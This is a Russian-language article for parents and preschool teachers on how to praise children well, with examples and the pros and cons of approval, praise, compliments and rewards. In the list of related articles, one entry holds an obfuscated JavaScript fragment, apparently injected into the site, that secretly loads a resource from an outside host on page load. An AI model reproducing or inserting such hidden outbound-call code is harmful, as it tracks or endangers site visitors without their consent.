Хвалить или не хвалить ребенка. Если хвалить, то, как правильно это делать.
статья (младшая, средняя, старшая, подготовительная группа) по теме
Похвала для детей, это как бальзам, способный творить чудеса – давать мотив к действиям, делать малыша уверенным в собственных силах, закреплять позитивные качества, помогать осознанию правил поведения в социуме. Но, в то же время, можно получить обратную реакцию, если ребенка перехвалить.
Скачать:
Вложение | Размер |
---|---|
statya_pohvala.docx | 412.83 КБ |
Предварительный просмотр:
Хвалить или не хвалить ребенка.
Если хвалить, то, как правильно это делать.
Умей настроить ребенка на позитив,
несмотря на жизненные обстоятельства.
Похвала для детей, это как бальзам, способный творить чудеса – давать мотив к действиям, делать малыша уверенным в собственных силах, закреплять позитивные качества, помогать осознанию правил поведения в социуме.
Но, в то же время, можно получить обратную реакцию, если ребенка перехвалить.
Как же хвалить ребенка?
1.В похвале вы должны оценить не ребенка, а его действия и поступки: «Доченька, твои игрушки так красиво сложены, что комната стала аккуратней выглядеть!», «Сынок, теперь твои вещи не разбросаны по всей комнате, а сложены и лежат на полке, а в комнате чистота и порядок!».
Нельзя: «Ты хорошая помощница», «Что бы я без тебя делала!»
Направляйте похвалу на дела и поступки, поделитесь своим отношением к совершенному действию, чтобы ребенок смог самостоятельно сделать вывод.
2.Похвала, сказанная слишком часто, теряет свой эффект, ребенок привыкает.
3.Хвалить необходимо за то, что дается с усилием, приложив немало труда. Легко доставшаяся похвала не дает стимула к дальнейшему преодолению трудностей.
4.Хвалите за то, что вызвало у вас удивление и восторг, выражайте свои эмоции ребенку: «Мне понравилось, как ты реалистично нарисовала дерево!»
5.Иногда возникает вопрос: «Хвалить или нет?» Если выполнено самостоятельное действие похвалите. Другого варианта и быть не должно.
6.Если ребенок прикладывает усилия к работе, но что-то не получается, похвалите за достигнутый результат: «Посмотри, какой красивый дом ты нарисовал, еще немного и забор дорисуешь».
Что может принести, отрицательный результат:
1. Если похвалить за то, что дается легко, без усилий.
2. Если вашему ребенку что-то дается тяжело, не ставьте в пример Петю, которому это дается легко. У ребенка формируете негативное отношение к данному виду работы.
3. За одно и то же действие, дважды награждать не следует.
Когда вы хвалите ребенка, он должен сделать вывод из ваших слов:
а) похвала, как поощрение;
б) четкое формирование правильных выводов ребенка.
Примеры:
«Спасибо доченька, что помыла полы в комнате, теперь в комнате очень чисто!»
Вывод ребенка: «Я помогла маме и ей теперь легче!»
Нельзя: «Ты моя помощница!» - далее сделать вывод ребенок не сможет, т.к. фраза взрослого не несет в себе конкретной оценки поступка.
«Спасибо сынок, что разложил покупки, теперь я быстрее приготовлю кушать»
Вывод ребенка: «Я помог маме, теперь у нее больше времени»
Нельзя: «Ты просто золото!»
2 вариант: «Спасибо, сыночек, что помыл посуду, теперь так чисто на кухне!»
Вывод ребенка: «Я помог маме и маме очень приятно!»
Нельзя: «Так даже я, не смогу вымыть посуду!» Нет конкретной положительной оценки совершенному действию.
Разновидности похвалы их плюсы и минусы
Положительная оценка действию
Положительная оценка действию расскажет малышу наше отношение к его деятельности или поступку. Мы рассказываем ребенку наше отношение, для того, чтобы завтра он смог порадовать нас еще большими результатами.
Плюс: когда ребенок осваивает новую деятельность, положительная оценка, является хорошим стимулом к работе и снизит неуверенность.
Минус: частая положительная оценка без использования других способов похвалы ведет к тому, что ребенок начинает обращать внимание не на действия и результаты, а на то, чтобы доставить удовольствие родителю. Результатом такой оценки станет лицемерие и лесть ребенка.
В свою очередь, если ребенок будет ставить на первое место интересы других, то из него вырастет личность с заниженной самооценкой и без собственного мнения.
Вывод: Положительная оценка действию не должна часто использоваться, необходимо пользоваться разными методами поощрения.
Одобрение
Одобрение мы применяем в случае, когда в работе присутствуют сомнения. В результате одобрения, мы как бы развеиваем сомнения и направляем действие к конечному результату. Одобрение дает ребенку ориентиры, как себя вести. При хорошей дозе одобрений, можно обойтись минимумом запретов. Но при этом все, что хорошо, получается, отмечать, а что пока не удается, не замечать. Реже, переводить в словесный план и делать «глобальные выводы»: «Вечно ты …!», «Вечно у тебя …!», «Никогда не …!». Доказано, что это оказывает парализующее гипнотическое действие, или раздражение.
Плюс: После одобрения, просыпается стремление к завершению работы, советы воспринимаются как помощь и по возможности реализовываются.
Минус: одобрение без поддержки других способов поощрения ведет к снижению самостоятельности, уверенности в себе, ведет к безынициативности.
Похвала
Похвалу ребенок слышит в результате выполненных действий. Она служит мотивацией к повторной деятельности и закреплению навыков.
Плюс: похвала является результатом выполненной работы. Не всегда работа выполнена правильно или ожидаема родителями. В некоторых случаях необходимо в плохо выполненной работе найти и позитив и объяснить ошибки.
Минус: если регулярно хвалить за выполненные действия, это порождает неумение доводить дело до конца. Малыш может не увидеть конечного результата в планируемой работе и отказаться от выполнения его.
Комплимент
Умение увидеть, заметить, разглядеть положительные черты, умения, навыки и донести их до ребенка.
Плюс: в связи с направленностью комплимента на личность, он помогает усилить имеющиеся у ребенка позитивные качества.
Минус: акцентируя внимание на одном качестве, можно превратить его в недостаток.
Награда
Награда является одним из сильных стимулов к деятельности. Награда – это поощрение за достигнутый результат или за результат, превзошедший планируемые достижения.
Какой бывает награда:
1)Материальной – игрушки, сладости, одежда, деньги и др.
2)Исполнение желаний.
3) Выполнение условий договора.
Награда является сильным стимулом к выполнению какой-либо деятельности. Ребенок, таким образом, со временем понимает, что нет ничего невыполнимого в жизни.
Уважаемые взрослые!
Любая похвала является особенно важной для ребенка в любом возрасте. Восприятие мира маленького человека, проходит через нашу реакцию на их поступки. Чем больше правильной похвалы слышат наши дети, тем уверенней они вырастают в собственных силах.
По теме: методические разработки, презентации и конспекты
Как помочь ребенку, если он забывает, путает, не правильно пишет буквы.
Материал будет полезен родителям и воспитателям, заинтересованным в обучении дошкольников. Игры позволят в дальнейшем избежать грубых ошибок на письме и в чтении....
«Хвалить или не хвалить ребенка?»
laquo;Хвалить или не хвалить ребенка?»Дошкольное детство – время, когда позитивные оценки личности в целом педагогически оправданы.Похвала, одобрение и поощрение необходимы ребенку, как в...
"Секреты воспитания вежливого ребенка" "Научите малыша трудиться" "Черты характера вашего ребенка" "Злость и жестокость" "Активные дети" "Если появился второй ребенок" "Если дети балуются" "Стеснительные и замкнутые" "Если ребенок упрямится"
Советы родителям, что делать и как вести себя с детьми, когда они проявляют различные эмоции....
Как договориться с ребенком, если он оказывается что-то делать
Краткие рекомендации родителям и воспитателям детей дошкольного возраста...
Что делать, если с вашим ребенком никто не дружит? Как помочь ребенку, если с ним не хотят дружить.
var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...
Как учить стихи с ребенком, если сам ребенок эти стихи учить отказывается.
Приятно, когда ребенок с удовольствием сначала учит и потом декламирует стихи перед любой аудиторией. Но что делать, когда надо выучить стихотворение обязательно (задали в садике, в музыкальной школе ...
Как учить стихи с ребенком, если ребенок отказывается
Рекомендация для родителей...